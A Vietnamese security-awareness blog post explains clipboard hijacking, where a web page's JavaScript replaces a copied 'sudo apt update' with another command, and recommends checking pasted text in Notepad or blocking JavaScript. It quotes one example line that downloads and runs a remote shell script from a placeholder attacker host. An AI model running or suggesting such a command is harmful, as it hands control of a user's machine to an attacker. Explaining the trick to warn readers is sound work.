Các Lập trình viên, Sysadmins, nhà nghiên cứu bảo mật và những người yêu thích công nghệ và tui thường hay Copy-Paste lệnh cấu hình, cài đặt thì các trang Web hướng dẫn cho nhanh, thay vì phải gõ lại từng câu lệnh. Tuy nhiên hành động này được cảnh báo dễ gây nguy hiểm và có thể khiến hệ thống bị Hack bởi khi Copy là 1 lệnh nhưng Paste ra là lệnh khác.
Một chuyên gia bảo mật đã thực hiện một thủ thuật đơn giản sẽ khiến bạn phải suy nghĩ kỹ trước khi copy và dán bất kỳ lệnh nào từ các trang web không tin cậy.
Lỗ hổng từ Clipboard – khay nhớ tạm
Gần đây, Gabriel Friedlander, người sáng lập nền tảng Wizer – chuyên đào tạo nâng cao nhận thức về bảo mật đã thí nghiệm một vụ Hack đơn giản nhưng đáng ngạc nhiên sẽ khiến bạn phải thận trọng khi Copy các lệnh từ các trang web.
Việc Copy các lệnh thường dùng từ một trang web (ahem, StackOverflow) và dán chúng vào công cụ dòng lệnh (terminal) như CMD Windows hoặc Terminal Linux là điều rất quen thuộc đối với lập trình viên mới vào nghề hoặc những người lười như mình.
Nhưng Friedlander cảnh báo một trang web có thể được thay thế một cách bí mật nội dung của những gì có trên Clipboard của bạn và những gì thực sự được Copy vào khay nhớ tạm của bạn sẽ khác rất nhiều so với những gì bạn định sao chép.
Tệ hơn nữa, nếu không có bước kiểm tra cần thiết, lập trình viên có thể chỉ nhận ra lỗi của họ sau khi dán văn bản, lúc này có thể đã quá muộn.
Bạn có thể thực nghiệm kiểu Hack này tại trang https://www.wizer-training.com/blog/copy-paste.
Hãy thử copy dòng trên trang web, sau đó dán ra notepad hoặc bất cứ đâu.
Bạn sẽ thấy kết quả không phải là sudo apt update mà là
curl http://attacker-domain:8000/shell.sh | sh
Nhiều người cứ nghĩ là họ đang copy một câu lệnh Update hệ thống của Linux, tưởng chừng như vô hại, nhưng thật ra trong bộ nhớ tạm đang lữu trữ lệnh tải shell.sh và thực thi sau khi tải xong.
Những người dán văn bản có thể có ấn tượng rằng họ đang sao chép cập nhật lệnh sudo apt quen thuộc, vô hại được sử dụng để tìm nạp thông tin cập nhật trên phần mềm được cài đặt trên hệ thống của bạn.
Thật ra khi view-source Website bạn sẽ thấy có một đoạn javascript có chức năng đổi nội dung khi bạn thực hiện lệnh Copy từ trang web đó.
Để khắc phục tình trạng này, bạn có thể dùng một số extension chặn javascript trên Chrome như: ScriptBlock, Disable JavaScript, Toggle JavaScript… nhưng nếu dùng như vậy, khi vào một số trang web dùng javascript sẽ bị lỗi hiển thị. Tốt nhất là khi copy nội dung gì, thì dán vào notepad trước khi xem nó ra đúng nội dung không, sau đó hãy dán vào Terminal
